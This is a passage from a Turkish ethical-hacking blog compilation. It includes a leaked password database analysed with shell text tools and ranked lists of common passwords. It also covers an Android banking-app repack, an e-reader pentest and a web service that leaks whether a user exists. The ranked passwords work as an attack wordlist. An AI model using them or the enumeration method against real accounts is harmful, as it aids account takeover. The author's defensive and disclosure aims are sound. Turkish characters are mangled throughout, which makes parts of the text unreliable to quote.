Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 23: Hack 4 Career - 2011

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

